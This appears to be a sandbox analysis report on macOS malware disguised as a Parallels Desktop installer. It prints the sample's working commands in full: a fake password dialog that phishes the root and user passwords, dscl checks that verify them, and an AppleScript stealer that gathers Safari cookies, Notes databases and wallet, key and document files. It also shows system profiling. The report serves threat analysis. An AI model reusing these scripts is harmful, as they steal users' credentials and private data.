max time kernel
177s -
max time network
227s -
macos-10.15_amd64 -
macos-20231201-en -
resource tags
arch:amd64arch:i386image:macos-20231201-enkernel:19b77alocale:en-usos:macos-10.15-amd64system -
04/02/2024, 10:26
Static task
Behavioral task
Malware Config
Identifies hardware specifics through system_profiler 2 IoCs
ioc Process sh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType" Process not Found system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType Process not Found -
AppleScript 1 TTPs 12 IoCs
ioc Process osascript -e "display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer" Process not Found osascript -e "tell application \"Terminal\" to close first window" Process not Found sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'" Process not Found osascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\",\"png\",\"jpg\",\"jpeg\",\"wallet\",\"keys\",\"key\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell" Process not Found sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'" Process not Found sh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit" Process not Found sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'" Process not Found sh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit" Process not Found osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer" Process not Found sh -c "osascript -e 'set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\",\"png\",\"jpg\",\"jpeg\",\"wallet\",\"keys\",\"key\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell'" Process not Found osascript -e "display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer" Process not Found osascript -e "tell application \"Terminal\" to close first window" Process not Found -
Resource Forking 1 TTPs 4 IoCs
ioc Process /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper Process not Found /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper Process not Found /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper Process not Found /System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/ Process not Found
/bin/shsh -c "sudo /bin/zsh -c \"/Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop\""1⤵PID:558
/bin/bashsh -c "sudo /bin/zsh -c \"/Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop\""1⤵PID:558
/usr/bin/sudosudo /bin/zsh -c /Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop1⤵PID:558
/bin/zsh/bin/zsh -c /Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop2⤵PID:559
/bin/shsh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit"1⤵PID:561
/bin/bashsh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit"1⤵PID:561
/usr/bin/osascriptosascript -e "tell application \"Terminal\" to close first window"2⤵PID:562
/bin/shsh -c "dscl . authonly \"root\" \"\""1⤵PID:563
/bin/bashsh -c "dscl . authonly \"root\" \"\""1⤵PID:563
/usr/bin/dscldscl . authonly root1⤵PID:563
/bin/shsh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"1⤵PID:564
/bin/bashsh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"1⤵PID:564
/usr/bin/osascriptosascript -e "display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"1⤵PID:564
/usr/sbin/kextcache/usr/sbin/kextcache -F -system-prelinked-kernel1⤵PID:569
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon1⤵PID:591
/usr/bin/loginlogin -pf run1⤵PID:602
/usr/libexec/path_helper/usr/libexec/path_helper -s3⤵PID:605
/usr/bin/localelocale LC_CTYPE3⤵PID:606
/usr/bin/openopen Install-Parallels-Desktop3⤵PID:636
/usr/sbin/cfprefsd/usr/sbin/cfprefsd agent1⤵PID:622
/usr/bin/loginlogin -pf run1⤵PID:643
/usr/libexec/path_helper/usr/libexec/path_helper -s3⤵PID:645
/usr/bin/localelocale LC_CTYPE3⤵PID:646
/bin/shsh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit"1⤵PID:649
/bin/bashsh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit"1⤵PID:649
/usr/bin/osascriptosascript -e "tell application \"Terminal\" to close first window"2⤵PID:650
/bin/shsh -c "dscl . authonly \"run\" \"\""1⤵PID:651
/bin/bashsh -c "dscl . authonly \"run\" \"\""1⤵PID:651
/usr/bin/dscldscl . authonly run1⤵PID:651
/bin/shsh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"1⤵PID:652
/bin/bashsh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"1⤵PID:652
/usr/bin/osascriptosascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"1⤵PID:652
/bin/shsh -c "dscl . authonly \"run\" \"root\""1⤵PID:654
/bin/bashsh -c "dscl . authonly \"run\" \"root\""1⤵PID:654
/usr/bin/dscldscl . authonly run root1⤵PID:654
/bin/shsh -c "osascript -e 'set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\",\"png\",\"jpg\",\"jpeg\",\"wallet\",\"keys\",\"key\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell'"1⤵PID:655
/bin/bashsh -c "osascript -e 'set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\",\"png\",\"jpg\",\"jpeg\",\"wallet\",\"keys\",\"key\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell'"1⤵PID:655
/usr/bin/osascriptosascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\",\"png\",\"jpg\",\"jpeg\",\"wallet\",\"keys\",\"key\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell"1⤵PID:655
/bin/shsh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"1⤵PID:661
/bin/bashsh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"1⤵PID:661
/usr/sbin/system_profilersystem_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType1⤵PID:661
/usr/bin/csrutil/usr/bin/csrutil status1⤵PID:663
/bin/shsh -c "dscl . authonly \"root\" \"p:true \""1⤵PID:674
/bin/bashsh -c "dscl . authonly \"root\" \"p:true \""1⤵PID:674
/usr/bin/dscldscl . authonly root "p:true "1⤵PID:674
/bin/shsh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"1⤵PID:675
/bin/bashsh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"1⤵PID:675
/usr/bin/osascriptosascript -e "display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"1⤵PID:675
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...